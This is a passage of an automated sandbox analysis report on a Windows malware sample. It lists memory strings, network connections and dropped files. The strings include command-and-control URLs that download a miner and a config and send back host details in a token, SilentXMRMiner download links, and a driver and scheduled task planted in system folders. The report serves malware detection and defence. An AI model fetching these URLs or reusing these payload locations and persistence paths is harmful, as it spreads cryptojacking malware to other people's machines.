00000007.00000003.2453484354.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2508746813.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2673880736.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2399949653.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2522344856.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2689820350.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2358547789.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2386863025.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2648797169.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2412212318.0000000000778000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/0
Source: loader_5879465914.exe, 00000007.00000002.3021798885.0000000003750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/A
Source: Microsoft-Edge.exe, 0000000E.00000002.3022066818.0000000003705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/R
Source: curl.exe, 0000000A.00000002.2354249733.00000212B53B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.php
Source: curl.exe, 0000000A.00000002.2354249733.00000212B53B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.phpe
Source: curl.exe, 0000000A.00000002.2354315506.00000212B53EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2353963310.00000212B53EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.phpy
Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF47000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000002.2619013349.000001DFDEF54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exe
Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exePz
Source: curl.exe, 00000052.00000003.2618490481.000001DFDEF7B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000002.2619230837.000001DFDEF7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exeX
Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.execk.dll
Source: Microsoft-Edge.exe, 0000000E.00000003.2439702684.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2550111525.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426774904.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2467067729.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426774904.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000002.3020533522.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2412607559.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2497419323.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2497419323.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2619479146.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2690557192.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2467067729.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2605563246.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2669985845.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2564142044.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2523814240.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426458006.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2577879379.0000000000914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnk
Source: loader_5879465914.exe, 00000007.00000003.2632263244.000000000377B000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2425064392.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481189507.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2496432695.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481058326.0000000003743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online:443/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003740000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resource
Source: svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003780000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.000000000359F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.z
Source: svchost64.exe, 0000008B.00000002.2788969573.00000000036ED000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.0000000003736000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sanctam.net:58899
Source: svchost64.exe, 00000095.00000002.2847173181.0000000003510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49872 version: TLS 1.2

Too many similar processes found

Source: conhost.exe	Process created: 91
Source: cmd.exe	Process created: 156

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Creates driver files

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe

File created: C:\Windows\system32\Microsoft\Libs\WR64.sys

Creates files inside the system directory

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\system32\services64.exe
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\system32\Microsoft\Libs
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\system32\Microsoft\Libs\sihost64.exe
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\system32\Microsoft\Libs\WR64.sys

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C2E440	6_2_00C2E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C2E440	6_2_00C2E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C24CF0	6_2_00C24CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C63068	6_2_00C63068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C57D83	6_2_00C57D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C24AF0	6_2_00C24AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C6765B	6_2_00C6765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C62BD0	6_2_00C62BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C6777B	6_2_00C6777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C66F09	6_2_00C66F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C68720	6_2_00C68720
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 107_2_00007FFD9BAC0ECD	107_2_00007FFD9BAC0ECD
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 139_2_00007FFD9BAA7642	139_2_00007FFD9BAA7642
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 139_2_00007FFD9BAA6896	139_2_00007FFD9BAA6896
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 139_2_00007FFD9BAA1141	139_2_00007FFD9BAA1141
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 144_2_00007FFD9BAC5772	144_2_00007FFD9BAC5772
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 144_2_00007FFD9BAC49C6	144_2_00007FFD9BAC49C6
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 149_2_00007FFD9BA97642	149_2_00007FFD9BA97642
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 149_2_00007FFD9BA96896	149_2_00007FFD9BA96896
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 149_2_00007FFD9BA9108D	149_2_00007FFD9BA9108D
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 159_2_00007FFD9BAD5772	159_2_00007FFD9BAD5772
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 159_2_00007FFD9BAD49C6	159_2_00007FFD9BAD49C6

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
